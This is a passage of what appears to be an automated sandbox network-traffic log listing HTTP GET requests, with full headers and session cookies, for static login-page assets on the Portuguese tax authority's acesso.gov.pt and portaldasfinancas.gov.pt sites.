TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /app/pfstatic_static/js/pf-footer.js HTTP/1.1Host: static.portaldasfinancas.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /autentica_static/img/background.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/autentica_static/css/styles.css?cb=5.2.10Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/img/logo-at.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /at/html//autentica_static/logos/logotipo_AT.png HTTP/1.1Host: www.portaldasfinancas.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /autentica_static/js/smartresize.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/js/footer/footer.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/js/modernizr.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /autentica_static/img/autenticacaogov.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /autentica_static/img/iconGovPt_20x20.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /autentica_static/img/logo-at.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /autentica_static/js/app.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /autentica_static/js/capslock-login.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /autentica_static/js/smartresize.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /autentica_static/img/background.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /autentica_static/icons/favicon.ico HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /autentica_static/js/capslock-login.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; 